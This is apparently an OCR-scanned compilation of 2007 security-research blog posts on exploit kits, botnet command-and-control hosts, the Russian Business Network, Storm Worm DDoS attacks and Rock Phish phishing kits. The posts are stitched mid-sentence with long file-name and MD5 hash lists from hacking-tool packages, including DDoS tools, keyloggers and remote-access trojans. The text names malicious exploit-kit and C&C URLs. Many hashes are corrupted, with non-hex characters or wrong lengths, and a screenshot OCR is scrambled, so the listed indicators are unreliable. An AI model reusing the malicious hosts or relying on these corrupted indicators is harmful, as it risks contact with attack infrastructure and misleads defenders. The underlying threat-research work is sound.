d34thnation.com/mpack/index.php 
mp3fans.org/mpack084/ 
innaidina.info/mpack/ 


WebAttacker’s Hosts : 


secondsite2.com/cgi-bin/ie0604.cgi 
Isdman.info/cgi-bin/ie0604.cgi?bug=MS05-001 &SP1 
telecarrier.es/cgi-bin/ie0604.cgi 
stmare.info/cgi-bin/ie0604.cgi 
redcrossonline.cn/cgi-bin/ie0604.cgi 


Zunker’s C &C: 


66.148.74.7/zu/ 
bundeswehrzentrale.org 
skilltests.org/zu/zc.php 
zup.secondsitel.com/zu/index.php 
stat1.realstatscollect.com/zu/ 
webcounterstat.info/zu/ 


| also find it very interesting to see [4]VeriSign publicly admitting of hacking into the 
hosts behind the malware kits - the Russian Business Network in this case - to assess the 
damages done in the form of number of infected PCs and with what exactly : 


"When VeriSign managed to hack into the RBN computer running the scam, it found ac- 
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e€5277bc7d04a32074f9e9b645cd80882 
DevComponents.DotNetBar2.xml 
54c686ca426dd7d045f99a55e7d726c6 
Jays Booter.exe 
778cb37b45bed32662c67748edf508ea 
Jays Booter.pdb 
8197a14c1e519f61f0a7da254e499350 
Jays Booter.xml 
3c7d81de601e8606169c9434681e96f8 
FILE ID.DIZ 
18690280961cd0326027657625209c6d 
readme.doc 
b250d710f02c94846cb1d792a5d5707d 
Client.exe 
ac72c0ac380c4ae38a3d3eced609d094 
NetBot.ini 
b23b4a90e38ac7cab60be3de36fad5fb4 
Be.Windows.Forms.HexBox.dll 
led5fe859aba26b4f8f0afc6341cd62f 
cecil LICENSE.txt 
350a4fe8061517098a67b315b2d43557 
ChangeLog 
69d82553a2abcdc0274d1b0d7911a5ca 
credits.txt 
49287ee23dcb31940a73e755a64852b2 
ICSharpCode.NRefactory.dll 
e56dba60f855b1b1fe8c3dd0cc830ae3 
ICSharpCode.SharpDevelop.Dom.dll 
b194e825dd8d893f6af029cae90f31ad 
ICSharpCode.TextEditor.dll 
2f651edf3947661ed637630b1081ab92 
License _DotNetReflector. rtf 
58c218c11fd6020301463ff5ce080929 
log4net.dil 
5f3bd963f02108c36592b5728fa725c5 
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log4net LICENSE.txt 
74ae3e8ad4267784fcal593fcbe3d091 
log4net NOTICE.txt 
00c0602e7bb66290e5d5848293d865b9 
MIT-LICENSE.txt 
865eccb377ff54b301f53860450b4f64 
Mono.Cecil.dll 
853046ad65ecaae62001c2bb08248919 
Mono.Cecil.Mdb.dll 
494f2c8878b2cf0ca3d1783397d2fldc 
Mono.Cecil.Pdb.dll 
dd286675bf8d977c501a9514edc75c51 
Net-Weave R.exe 
26e8cb237d43b4b4cal4eec2ed60f614 
README.FIRST.txt 
40de1a83a3ab42e64642ba96c3clfcd2 
readme. rtf 
d02c126d72ec26d8e540dd1e5d863306 
RedGate.Reflector.Addin.dll 
856e34e165380077de54b27f3fdb04d4 
RedGate.Reflector.DevPathSetter.exe 
f542a82e1a197679abd802e9ef539903 
Reflector.exe 
4b305b64e88ca85ad67eb6fe3dc8f80fe 
Reflector.exe.config 
b8b115a63c9368a5ff56f0bead67be64 
ReflectorCmd.exe 
3e4da95ae0216052e064cfd9f068a792 
Reflexil.CecilStudio.dll 
414f470b37bde9ebc934cac8c5f7b014 
Reflexil.dll 
276670904e8d556d8992a76992feb4d3 
Reflexil.dll.config 

20a0849e85 lalefbfdefc2ad9fc0e63e 
Reflexil.Reflector.dll 
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008a3f92b01ba098f1168acclea8b4d2 
System.Data.SQLite.dll 
80725a732aba27911402f9ca09fede23 
XPlugin.dll 
195eb26d43dd473543b2c943dce3f90a 
39dll.dll 
52835d665d00d980eb4b75550dbf3cae 
ProDoS v1.0.exe 
5d6fdc99e6583d7cc7c97b69d7861f54 
Read me.txt 
c2278d2f813b0c16580eade7 4de99996 
mingwm10.dll 
a2a2c67d57bac6ebd154075e1362ecaa 
QSlowloris.exe 
0541e3b9efe8610c13dcb1fc3889ce37 
QtCore4.dll 
61622fe2a7aa98d36194f7c876e4d2d6 
QtGui4.dll 
c66734ffbf56bedb4570c6dbc8d1813e 
QtNetwork4.dll 
a008869ad3d7dd656b4575799b635f60 
ServerDeath.exe 
2707f294769ddef6dc9ad332384f4fca 
AxInterop.MSWinsockLib.dll 
54efbc05d29b0f107741ed643dcb5c68 
Interop.MSWinsockLib.dll 
343ec1e971305f4b45e8cb168cb2caac 
Slayers DDoS V2.exe 
1e0a734de2050ad96e2b4d1215ea8b10 
TeVDos.exe 
ee42d2ec5fc25dlaebbd04dec8ffe907 
TevDos.class 
e52a36ca84898f3388a4d3e96d3e22f1 
readme.txt 
be8125b099b4ee86f659cfef04b63alb 
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UDP Unicorn.exe 
8862acb23e31ef4e59d524612d4c5542 
config.ini 
b23c5f8cdb97c04355668be92354247c 
music.mp3 
dc5a7eb6bd42de84d271064f8dce3136 
ac.c 
5f8cc2e104431c32b971aeeb31d0c223 
ac.h 
11a8025bb692f373dfal9faea2e7 7f93 
config.c 7a9b1ffl0e8al04d425c6e72c69a72e5 
config.h 02c6dd430244dd320f73b2786aacf7e6 
GNU General Public License.txt 
52b22f4a0358441eb5d028d7c6b93787 
main.c 
7dfd03f966b12545ba244085f8c601db 
music.c 
1c6417cec85f38710dc82bcc17b7e698 
music.h 

739aabbdfdff7 6f2a06ba8db2d0f5b12 
netinfo.c 
9b70286f1c5eb27349b775ac131897e6 
netinfo.h 
80ff7115d89b847cf983feal6b7991ed 
ps.c 
4d6314576fd453f5855f4a8a801a4a25 
ps.h 
17120c2673579fdb88ffdb8b376382a5 
resource.h 
62fb22015fa998225df284d23b6eb41a 
resource.rc 
dc77db09961c162226c0248dae93d8f5 
udpunicorn.c 
09362cfb987010130ff641852ca7fa06 
UDPUnicorn.exe.manifest 
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f2eb83fa0d8223f29eabb0a38f029cee 
udpunicorn.h 
7722d3bf721d3b3de6538f90e8cabeac 
UDPUnicorn2.0.cbp 
67e1d158158edf1515d95a459cfea289 
attacking.ico 
fd085eead12c8aalf303318b4654a613 
idle.ico e12a30ca6cc8b35395af755880dc8746 
mainicon.ico 
86e05a25555e37cf590a552e52fee462 
music.ico 
e€3f842be9699212f486fd8d0429652bc 
Command line.txt 
a6f261005fb97cc341ef83466c8f9a10 
Unknown DoSer release.exe 
4f3782e2f6f8daeeb7cf7957d60b8044 
novo-dangos-001.ico 
a3d8982a5337f59aele92afb925a949e 
xDDoSeR Bot Builder.exe 
52053b327d2b1ae37f27cd646fdfd0a9 
xDDoSeR.exe 
d4fe7991552fcb407c68c7813cf6d847 
Abalams IP Tracer.exe 
ebbb9eda57ae7796ab6b0aaba84b3be8s3 
Abalams ISP Tracer 3.0.exe 
6356e9bbf08aad29bd82da8d2ad6759e 
Abalams ISP Tracer.exe 
f4831615df9bea3f57b3431884498e0c 
Advanced IP Scanner.|Ink 
6405b72aa94d046b51b61f496063d93a 
Advanced Port Scanner (2).exe 
3df74ac906bd54218ce9229711291a34 
Advanced Port Scanner.chm 
368377cda8d072e1643cc69f6a5dd8fa 


Advanced Port Scanner.exe 
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867c73b6bcf417484c25d4f08c948736 
CloudFlare Resolver [Hackerpunk1].exe 
dfdeb27c2d9fa3a661817d0c4bfb9b6c 
html.tp! e5f6570ace541c5f71640b2950f3f034 
ip grab.exe 
793c4fc0c83719ae4ac064d1leb17cead 
Ip Tool.jar 
9e012f171002f7b689ba1bc1b3073ab7 
IP %20Tool.jar 
9e012f171002f7b689ba1bc1b3073ab7 
lp-Tracer.exe 
ad65029ed9fedf576badb8cb293d5336 
Natas- Pass for ISP Tracer 3.0.txt 

port cheker.exe 
1d83b3927df6f1f4db76830a74d9592e 
Port Scanner - log.txt 
de3f034c7d192a5a7cle2889bd742696 
pscanl13.exe 
7f2dd700c862b18082f3bc059baab60f4 
Swags Website IP Gabber.exe 
e776d8266c828508ae4c367ae7b987bb 
uninstal.exe 
b83429c6f8335b63dd316bb83edaff23 
uninstal. ini 
64c3159eb58eled00cdel8a4e989f53b 
versions.txt 
e4c091a36e609525dacdab92c495b7b0 
website ip grabber.exe 
b5bd06aa7f81le2eaad4644bbd0103e36 
Anonymous Keylogger.exe 
70f7fdd57cd561a114ac03e1f50649fe 
Dracula Logger.exe 
f51a2895a0aee4f6290de37ac8a2042F 
Vulcan Logger.exe 
86470cdfeaa7cf079600ef0859e563c2 
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Dissembler Lib.dll 
180089220297d8eaa51b6e125092ecla 
PoisonLogger.exe 
e2992b7e2f2be8249e85d4e617f1e939 
DevComponents.DotNetBar2.dll 
d068ce38f5f9caedleb63ffb1169ede92 
Project Neptune v2.0.exe 
e044f33cfd266e5c873314c9099e4150 
Syslogger Builder.exe 
4c7f0fe2ce333777386b95ed0c2a8304 


stub.exe d761f74f1f86432d461a548f026f4b89 


UltimageLogger by exe.exe 
b6748b36d4060377072e758a0f560457 
Credits.txt 
353523394fac306b6269ece9d795aaal 
Dissembler Lib.dll 
4127d00b294f09835929297a6cc8fa79 
Read Me.txt 
2eea9139f4640533892748ed44b9e445 
Unknown Logger Public V 1.5.exe 
6d52e531d7dacdc27a83183b110f0097 
13k+ Proxy List.txt 
a3f89e509659cafdbe1758a93c17c9d9 
blacks proxy graber.zip 
60cd264a2f6f9f6E5fd4126b920bb9b6f 
Proxi.txt 
837d4b4e537b7e93baa061a96f03ef20 
proxies.txt 
84f2d4898227d4ca6da309100419e071 
Proxy Finder.exe 
80369d826b3e19816b67057f03944f01 
Proxi.txt 
837d4b4e537b7e93baa061a96f03ef20 
DownProxy.exe 
bcbf3b5b0a4a6f1455d2a96dfeef3683 
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Proxy Finder.exe 
80369d826b3e19816b67057f03944f01 
disclaimer.ini 
95f034689e202b643a319e17b6bc015c 
njRAT.exe 
d913ce14475df9e16e4c506e9025d6f2 
Spy-iNet.exe 
a07a555b8f90186452c4740f6a1f885b 
sqlite3.dll 
744dcc4cbbfbb18fe3878c4e769ec48f 
Tiny.exe 443bea7ce6882a39b9ca3c89ed5f30b1 
Blackshades NET Setup Tutorial.pdf 
5b73cc2ba69f315230844ecae78b3c4e 
Blackshades NET User Guide. pdf 
7753e25cclafalbebce1d9264b17e098 
client.ini 
3601edfb2b6237d0fd9783ae879e139b 
HWID.exe d7bf30b4b2da19f3e327f951736d4f11 
Purchase Full Version.txt 
de75a862ef718632827eab641447c021 
Read Me.txt 
66941bff8fecac650dfe15e123c91f8f 
Codejock.Controls.Unicode.v12.0.2.0cx 
ec08be364fd4ec034597200c42c04b0a 
Codejock.SkinFramework.v12.0.2.0cx 
d6901189ab414fea205efcfde159b021 
CODEJO 1.oca 
928ab3d2ffe0944b9dd8bd648d7042e5 
CODEJO 2.0ca 
25f7cc50f4bbf81ff82c243f20cde0c7 
data.ini 55bbb63ea440100d124e8cf2a167e99f 
IPList.dat 
06ff3d8a37ff4517ae89e5b156f21563 
MSCOMCTL.oca 
6812745a19da4ca5d019813048fce3b7 
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MSCOMCTL.OCX 
774a15583db1ad44c5ee32309c840c96 
MSDATGRD.oca 
5f4f22ce7fa9761538120c71bcb3dd6d 
MSDATGRD.OCX 
fa8de5f76ba59bc4190fde2c78401d40 
MSINET.oca 
21362dbc13344ad0b047a505a9585303 
MSINET.OCX 
7bec181a21753498b6bd001c42a42722 
mswinsck.oca 
39205aaba3a134e902f09933b3dc7fcl 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
24cace68d9cddd5de2748aac7ea6/7da8 
RICHTX32.0ca 
eca371853447cf031acc3a209e039b7b 
RICHTX32.0CX 
eb4a8f35a70a887fe32f43a3aa7d4e9a 
upx.exe 
c93d008e5ee8495d59352fa945aale6c 
L.gif 
683f5e1bcc3a92410c980983b10d13cc 
10.gif 
4a7b2912f159062c30a50347d181fe70 
100. gif 
6c446f42ec0da49fd10c839ba20e2e63 
101.gif 
c3741a13c68e380bb05d41e6b29feae9 
102. gif 
da6f0195c6594cb088b09e7b07420945 
103.gif 
f69713c9c4ac1460a155517c8f2e8b70 
104. gif 
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2f1ad5a7035f3bc92178f7d15a9affed 


105.gif 
d46190d6139ee5e4222194af3d642188 
106.gif 
72a821068409fd0ea796b67355982d99 
107.gif 
a1412bbb7e48e1c195e64aadde8328fb 
108.gif 
84189a1b08c5f722be99b16da84d9786 
109.gif 
d6363bfd8f230130db77elecf99417e4 
11.gif 
bbbf223861d1bd48a09229562db61276 
110.gif 
fo1a8d4a6e3159d57a47d1aa5a569e06 
111.gif 
9d39fb34bc9519bd8f2d90a9151839fc 
112.gif 
a66f7313717368e657ald5a29deafcde 
113.gif 
ea03aeceeb97a268f22a907af5483edf 
114.gif 
f99c5607b0589cdfa64a602d0c185662 
115.gif 
a3afd015d3081ed7bcd09bda2e6b9631 
116.gif 
84be4b9b650a29af4a1196a16049130c 
117.gif 
ee0538cled0a23e838b1cae4ccdf67ad 
118.gif 
9efaf3cf2ca0c5fb5fe889c7974e246b 
119.gif 
adOfadf4bf7595606d0b1ff596790b10 
12.gif 


afd00e1432935d39c6fcbbe4a75afbl1d 
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cumulated data representing 30,000 such infections. “Every major trojan in the last year links 
to RBN” says a VeriSign sleuth." 


Unethical penetration testing of malicious hosts to assess the damages by the malware 
Campaign in question wouldn’t result in the malware authors striking back with legal com- 
plaints, instead, they’ll forward some DDoS bandwidth back at the investigating IPs, a 
consequence I’m sure researchers reading here have experienced before. On the other hand, 
the RBN themselves are getting more malicious with every new campaign, just consider for 
instance that Russian Business Network’s IPs were behind the [5]Massive Embedded Web 
Attack in Italy that took place in June, 2007, and the most recent [6]Bank of India breach as 
well. 


1. http: //blogs. pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack. pdf 
2. http: //ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 


3. http: //blogs. pandasoftware.com/blogs/pandalabs/archive/2007/05/08/Zunker . aspx 

4. http://www.economist .com/daily/columns/europeview/displaystory.cfm?story_id=9723768 
5. http: //ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 

6. http: //ddanchev. blogspot . com/2007/08/bank- of - india-serving-malware .htm 


3.9.9 Storm Worm’s DDoS Attitude (2007-09-11 16:10) 


The Joy of Tech by Nitrozae & Snaggy 


= = 
I'm sop 
Apparently he's one of 
the world's best at a new 
computer game. 
Oh really! 
Which game? 


joyoftech.com 


Stage one - infect as many end users with high speed Internet access as possible through 
[1]the use of client side vulnerabilities. Stage two - ensure the longest possible lifecycle 
for the malware campaign by having the newly released binaries hosted at the infected 
PCs themselves. Stage three - take advantage of [2]fast-flux networks to make it harder to 
shut down the entire botnet. And stage four - [3]strike back at any security researcher or 
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120.gif 
41e20f0b1984a737cc3eld5a7af485dd 
121.gif 
a29e28c42e6936c160b2bdb7d7cc1la26 
122.gif 
ca051f77d62b0e161f41f580f3d94387 
123.gif 
fbee49d578ccac891lecb3f9d7924fea7 
124.gif 
40e25159bd20b6cfd04b9147feb948fc 
125.gif 
a3c2e7ef8bf259459c98310737d6f73e 
126.gif 
a938bead58df6e461f5b8e8aca7fd86Ff 
127.gif 
776a8a1522b9ef3a7da856ce9199f072 
128.gif 
170d7061lad5c3f7d9e20ece655c0lae7 
129.gif 
798b0d92a697elc3f6ab72e16b73f3d3 
13.gif 
2al11lcaaa66debd78a982b14ef5190371 
130.gif 
91936df2211679277b0b6484636fd922 
131.gif 
073da4142dcd4fe021b42b39e6522ca5 
132.gif 
bcd450500a9cc0a755ad74aa47347ac6 
133.gif 
011e0c12782613458eff8f272b0a69a2 
134. gif 
92b294a8079db7b0633c8dc991abf8c3 
135.gif 
6c4892982fded2195f45b9ce3dc909b7 
136.gif 
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57a862cc48674b6d78313a708314b1e9 
137.gif 
2285cebac842ed75edc950a69dddd48e 
138.gif 
822efc8a5921a6ca281ef1405fd4a303 
139.gif 
aal6ccd82f0302b2d7d5fd798f501759 
14.gif 
f5c96a8b759141c514798d6e7bla2cle 
140.gif 
6bdef28690e84b0667ebac75b6535319 
141.gif 
94f4alecf4095adbacc8cb69222394bf 
142.gif 
f45453308e7d319falfac4b517860185 
143.gif 
d19bee38077187409df3c6defbo2ed7cl1 
144. gif 
486939a940cf9546207fd9cab1lec028 
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vendor playing around with Storm Worm’s fast-flux network or somehow messing up with the 
[4]malicious economies of scale on a worldwide basis. On Friday | received an email from 
Susan Williams at [5]aa419.org, and as it looks like several [6Jother anti-fraud sites are getting 
DDoS-ed too : 


"On September 2 2007, online scammers began an automated DDoS attack against aa419.org, 
with the goal of shutting down the anti-fraud site. For some time, aa419 was able to filter the 
worldwide botnet’s attacks by monitoring connections and only allowing legitimate visitors 
to access thesite. However, by September 5 the hoster was being overwhelmed with nearly 
400 GB of incoming requests every hour. Rather than let their infrastructure melt under the 
onslaught, the server is currently offline. This massive distributed denial of service (DDoS) 
attack was inspired by aa419.org’s mission to blacklist and shut down scam web sites. Since 
2004, the all-volunteer organization has recorded more than 18,000 such sites. In addition to 
publicly warning potential victims of fraud, they work with hosters and registrars to take scam 
web sites offline quickly, with a success rate of over 97 % shut down. Susan Williams, press 
officer for aa419.org, said, "On the whole, we’re positive about this. Not that we enjoy being 
offline; quite the opposite. But being attacked with a botnet of this magnitude tells us that we 
are doing serious damage to the organized crime networks that run these scams." Internet 
crime is increasing at record rates, and aa419.org is at the forefront of the fight against it. 
"We will continue our work regardless of how many criminals are annoyed by it," Williams said." 


Castlecops [7]comments on the DDoS taking place at the site too : 


"This newest ddos round started about a week ago and knocked us Offline for a couple 
hours while we figured out what was going on. And we'’re still under attack, so if the site is a 
bit slower, you know why. Odd month really, lots of sites, lots of sites, are under ddos. We’ve 
got over 10k bots attacking us with more being added daily." 


As a friend recently pointed out - you ain’t making a difference until you start getting 
DDoS-ed. 


Cartoon courtesy of [8]Joyoftech.com, here’re [9]more courtesy of myself. 


Related posts: 

[10]The War against botnets and DDoS attacks 
[11]Emerging DDoS Attack Trends 

[12]DDoS On Demand vs DDoS Extortion 


ttp://ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 


ttp://ddanchev .blogspot.com/2007/09/storm-worms-fast-flux-networks.htm 


ttp://ddanchev. blogspot .com/2007/03/underground-economys- supply-of-goods. htm 
ttp://aa419.org/ 


6. http://it.slashdot.org/article.p1l?sid=07/09/08/1251238 
7. bttp://www.castlecops.com/a6822-Not_unexpected_but_were_still_under_attack.htm 


a. 
9. 
10, 


1. 
2. 
3. http: //www.disog.org/2007/09/opps-guess-i-pissed-off-storm. htm 
4. 
5. 
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button2.png 
7€349c221317f01b430852165de4370c 
button3.png 
Ofb84be31d8ad728f2845c46aa7ae3d0 
content2.png 
9d163df433f71d91f5b0fc72c5f3c5ab 
copy document.psd 
e56d61ced0696c99bf9F4FFF7 3 7f21c9 
copy.png 4693e94dbf5ba4e0a28ad4b0535f5828 
copy _hover.png 
d681f5b29baaa368e7f309f9d08fa5e2 
csv.png 
04bf5d1e88e09bb87b8d51a7411le5dab 
csv _hover.png 
04a1cb8a2794a605461f8211fe46738c 
current-bg. gif 
a25a5adal157f5257f3711433e9d60dce 
details close.png 
c898cf9ee14acb6c43909bbe29fb0b36 
details open.png 
10536bd1b325a99b5e8808de9fd597ce 
file _types.psd 
72310ab8674f6216e9a5f66ee5e58e3b 
menu-bg.gif 
fc8fe2e9f91fe48e8c4d9fbbbef9baaa 
menu6.jpg 
345d6c66d3648852c327c45c7db71585 
print.png 
b12a9855f2b25f5a770753ddf9546b4d 
printer.psd 
c38ee5906af9ae70e499fb3e0af86cd7 


print hover.png 
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4dded8247005cc26a611a713fdd31335 
top.png 
5c459dbdf52d16de53862af1cb365990 
x.gif 
9eca372807e455a437a5f90d171a1c47 
X.jPg 
0d19afc9603f799d355447d073a874f1 
xls.png 
e7db69e4cae5a975d12a9922bd62855c 
xls hover.png 
cc50cef418d070dc204157eal11f44ee8 
dwsync.xml 
5065fb2a6b6eb7c21c684aed3flb6c3f 
ZeroClipboard.as 
66d654280f11f11ff3e79afa002d9f78 
ZeroClipboardPdf.as 
49d7f08efd7el1a70d0ed324517c6eb77 
AlivePDF.swc 
eefb8ea538f0fc8d54e5613b4e81c83F 
TableTools.css 
79c445a96cd14e0338654d938f586bd8 
TableTools JUI.css 
b8c4a3eee3ff60bde898396657a75355 
dwsync.xml 
7f37c1aa3291befe116128b3b5c5157f 
background.png 
0953547609fedb241a4f6e86d47cc57c 
collection.png 
b8b601fbe718b934ec74e2e910c28afa 
collection hover.png 
aa2e592bab6fa4024a2e5adb63e4d2fof 


copy.png 49816clabbb0646aa7fadaea57cc2d3e 


copy _hover.png 
Ofc278d1lef776f8cledbc7ab272fd850 
cSV.png 
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04bf5d1e88e09bb87b8d51a7411le5dab 
csv _hover.png 
04a1cb8a2794a605461f8211fe46738c 
pdf.png 
b2c9c2e53dbe4590899b644e74e21cec 
pdf hover.png 
fee93c289a49bd1a98399b9bdadf4627 
print.png 
b12a9855f2b25f5a770753ddf9546b4d 
print hover.png 
4dded8247005cc26a611a713fdd31335 
xls.png 
e7db69e4cae5a975d12a9922bd62855c 
xls _hover.png 
cc50cef418d070dc204157eal1f44ee8s 
dwsync.xml 
cbde55536eeb08d7295ebf763cff344c 
TableTools.js 

d8a7fc6ca87eca93ae17 9df5ff74484b 
TableTools.min.js 
0f360b2767130536201ea007394b98ce 
TableTools.min.js.gz 
4a7a0c33b18d7d5e5488408550da32b8 
ZeroClipboard.js 
64b4a4d23618f65ed114a66f931bb76f 
dwsync.xml 
623a8de9c60a61aca9f9919dc3517689 
copy _cvs_xls.swf 
4fcaded96ee2274bc3c6b4d76b56a762 
copy cvs _xls_pdf.swf 
8913b3ec163aa46ffbo28685097bf7ald 
dataTables.scrollingPagination.js 
Ofcle916e990a0608484cbbfe412888c 
editable ajax.php 
7ea157f789dcb128703f2a7ecf2c35c5 
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jquery.dataTables.js 
b46aae7d5573b5af4e5101fbfa5774e1 
jquery.jeditable.js 
19d190e8916d737289ce1344c99af01b 
jquery.js 
73a9c334c5ca71d70d092b42064f6476 
jquery.quicksearch.js 
93faae42989ceb6af1l67f9be83c8aa7aa 
xpath.js e044c49d2d39ce95506e588f83a40b81 
dwsync.xml 
07fcdf2e47c32d759e9526124a9f91e9 
server cdk.php 
786b15e38959e93aa88cfc912ed73ac6 
server _conn.php 
4be8bc83feda38fa38cab5dc4373955a 
server pws.php 
97ab954779e1ef247703c1352d06b6al 
server pwsedit.php 
1aa4613e558875ff851a8752c496be21 
dwsync.xml 
d29f8bca37137dbe71bfb222bee213ec 
spryconn.php.mno 
5ed1fcbf444dfaa4445727769f9a0230 
sprykl.php.mno 
O8fce5f61b8999ed3aa7ac7e9ccclebb 
sprypws.php.mno 
d764f2a90967e4cd0db38f0c9e703064 
bssnet.sql 
4f6482687fb87c2437e8b59cae0092e7 
README.txt 
177d8ae4fbf60c1ca4d7a43faal4b06b 
crack. ini 

CyberGate v1.18.0 - trial.exe 
2f1067c715acda6b4e8310361d659351 
disclaimer.ini 
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3.9.10 209 Host Locked (2007-09-12 13:37) 


> | 
Onom lf > http Wlogin internetbankingzone biz (¢> > fa = 5 MtpMogin intemethankingzone bi2CamaPenedes/data tt 

Name Last moayrred 

Codi de client i nom d'usuari: 4132 

on Clau d'entrada: 4132 
ed Barclays/ 21-Oct-2005 11:21 Security: 1432 
[A cai xaPene les Ol-Mar-2006 19:09 | corr t ett rt tt ttt tet ee te eeeeeeee 
Q Codi de client 1 nom d'usuari: test 

wcenls Ol-Mar-2006 15:17 Clau d'entrada: test 
alliance-leicester/ 03-Mar-2006 11:05 Security: test 
a bankofcyprus/ 08-Nov-2005 05:32 Codi de client i nom d'usuari: pepito 
6 hankifacdt)and/ 03-Mar-2006 11:09 Clau d'entrada: pepito 
— Security: pepito 
banorte/ GE-Marsmooe GesS2 | asec ccieenaninapbiasebtapeavaseace 
2 bibanks re E 44 Codi de client 1 nom d'usuari: sd234S 
me igbapes 28+ Ont 200506 Clau d'entrada: 122455 
ed Cahoot/ 31-May-2005 12:50 Security: 13345 

: ‘ -Mar- : PEt ERIS Se a ee aT RS came a ‘ ; 

= c¢_bank/ BO: ARE: EU: 2OrS8 Codi de client i nom d'usuari: jejeje... nadie pica! 
© commanks 09-Feb-2005 04:52 | Clau d'entrada: dddddddddddd 
credem/ nidcammee saan: | ee cs re 
0 creyal/ 28-Oct-2005 09:08 Codi de client 1 nom d'usuari: test 
(5 Clau d'entrada: test 
=) data txt 03-Mar-2006 11:08 | security: test 
6 ¢ = 03-Mar-2005 11:09 wtntee ener rete reeset tce reer ree eees 
Q Codi de client i nom d'usuari: pepito 

faneco/ 17-Jul-2005 11:14 Clau d'entrada: pepito 
© gruppocarige/ 29-Oct-2005 09:44 Security: pepito 
halifax 03-Mar-2006 11:10 Codi de client 1 nom d'usuari: sd2345 
ibe ils 12-Jan-2006 14:10 Clau d'entrada: 122455 

Security: 13345 
am Lloyds/ GS-Nov-2AOS.TIsGS, || ccadecinmcwasanaascamencs'semaewamnes 
: Codi de client i nom d'usuari: jejeje... nadie picat 
-M . 2 

pathomade 02-Mar-2008 21720 | Clau d'entrada: dddddddddddd 
ted nwolb/ 23-Oct-2005 06:59 Security: dddddddddddd 
ae postbank/ 09-Mar-2006 21:44 
c nk 27-Oct-2005 11:59 
rbsdigital/ 03-Mar-2006 11:10 
o santander/ 26-Feb-2006 02:10 
© scotiabank/ 26-Feb-2006 00:12 
cremt/ 15-Sep-2005 13:27 
3 woolwich/ 17-Oct-2005 11:17 


Ever came across this fake error message? A "209 Host Locked" message on a fraudulent 
domain is the default indication that you’re on a Rock Phish domain, that is a single domain 
hosting multiple phishing campaigns aimed at different financial institutions. And as more 
Royal Bank of Scotland phishing emails are cirtulating in the wild, these very same emails 
pointed me to a Chinese Rock Phish campaign which was shut down as of yesterday. What is 
different in this campaign, compared to [1]the previous one? The phishers put more efforts 
into ensuring the phishing email gets through spam filters by using spacing, adding _ in 
front of random words, as well as the usual garbage content at the end of the email. All the 
URLs within the campaign are already in the [2]Phishtank, [3]DSLreports.com’s wisdom of 
the [4]anti-phishers crowd continues exposing Rock Phish domains on a daily basis, an effort 
worth keeping track of. 


The Rock Phish Kit is the logical evolution from [5]DIY phishing kits like the one I’ve [6Jalready 
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95f034689e202b643a319e17b6bc015c 
GeolP.dat 
1b35820c4520d9b7991aefla97089045 
README.txt 
b2d8a8aae21aa81a10f16d79a8516104 
sound.wav 
972f7a4b412cbbbe25ab374247a5777d 
Default. ini 
4e088dba94a845e0b69f3a6f287200ca 
New User.ini 
dbc66027d9925e6092ee1fc7db4677fe 
youtube. ini 
4a4c3a97ce7a6906139ef70e6a982eCc0 
cgdll1.dil 
b672d4135bde230538d766613077a532 
ClientTasks.file 

formssettings.ini 
558d8844fb860970d388a3edce092960 
groups.ini 
6a0ec326e58375ba30afb15ef8a0647b 
Login. ini 
a7233e9531393c6360e1327719352fd4 
ServerTasks.file 

Settings. ini 
bflc8ebd8d53ce391433db80e6e609d2 
changelog.txt 
7a23e5b811dd52e99cbdb72a7fe4cel12 


comet.db 72d97463e25ced56d42c498619e25af7 


config. ini 
7fad6fd7852c25ab6c3130919382ba29 
DarkComet.exe 
d761f3aa64064a706a521ba14d0f8741 
GeolP.dat 
b64ea0c3e9617ccd2f22d8568676a325 


readme _help.txt 
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00353577e820f2e875217981e5db11fb 
sqlite3.dll 
d3979db259f55d59b4edb327673c1905 
Celesty.exe 
c3009ee63bc661d9ea75eaeb256448ca 
readme.txt 
462d412af9b997384cfab01b1dfb9fe0 
AR. ini 
4276808f92d3efe8359cb03f9c45c9el1 
EN. ini 
d5b95d8dbcdcc5be0290067be9043009 
ES. ini 
4745b84e71d23454d2535cc608de57d0 
FR.ini 
a8568b41df3f0a47f875964e8feefa70 
GR.ini 
8b35cdf90f3d89d2502e1f61b2bbf631 
IT.ini 
1cb447996787264785c83d110c67ab13 
LV.ini 
84e0ff162036f454d019b48ba6af5f7a 
NO. ini 
832af9c517ea93df140200eadfeb3bd6 
SE. ini 
aledf15f421e4735c5701f0ea648b35d 
SR. ini 
fdfcOee3ad0f395e3078f600ed9bab689 
VN. ini 
24874c298b575ae2ac496765aa5f3f6b 
wallpaper _1.jpg 
#72131120657b33655e6ec741fc2c407 
wallpaper 2.jpg 
11d20f268b9a0dbc43f95c93abd30e30 
againzip.ico 
b87dbd32f31532ea8f7af9d28ee7800c 
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archive.ico 
5af592df403c50b14b47f9185cfb417f 
bittorrent.ico 
73d8decab435acb32dfldce812ed3acd 
chrome.ico 
16a9e9b49f6e08635ebe55f5ecd5f346 
cubic.ico 
f273cf2c932b6d768bb2d1d62e9d2a4a 
emulefold.ico 
7a19ef1c29ec87e43983fc94f95ce198 
facebook.ico 
c6120e467c833d5f277c2b939251918e 
facedebook.ico 
a219e70366471a9b13953789791e9a42 
female.ico 
9ec80b1ed453ced93e4dc6f1131e4cf7 
ffox.ico 3bb3e1c6a6ad5c89934f34be4b1e458d 
ffoxwhite.ico 
882bbfbf5cbc4c791e32e6a74d0f4eed 
girl.ico 846e57f8ba357943141eeebd6c454e33 
heart.ico 
ad26dd83ae2ec2ddf0cc07021825d063 
idontknowlol.ico 
7ac0c49cc1cd32b141693995e8163479 
limewire.ico 
8f880b2b80387f6acde78230ef28bc77 
limwizearrow.ico 
75¢c74ff8112550471b9735189cb36c70 
limy.ico 925fdf30a687bba4d7bd85def5def9f0 
mov.ico 
71ea5c0cc8245978042ca1a57e70149c 
rar.ico 
f11ca004114c0382836197bb597bf509 
shareaza.ico 
ede558c3365551e09a966536b1a61209 
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steam.ico 
a4e06cf0293bc3fa83db852e1c9ca2bb 
steamfag.ico 
a7b87171a833e2eae9e0610545e4fe48 
utorrent.ico 
13a203726213ebe1120330a01c85e020 
utorrent2.ico 
fe767036dde72aa116dfec4d85316097 
utorrentfold.ico 
9bd46aa8a6a9515ce610c48b568b04db 
viagrafemale.ico 
fcf35c04537b9fObfed48b00dfdac72f 
win.ico 
668b3283b8b3355e456d8f757d29d306 
winfolder.ico 
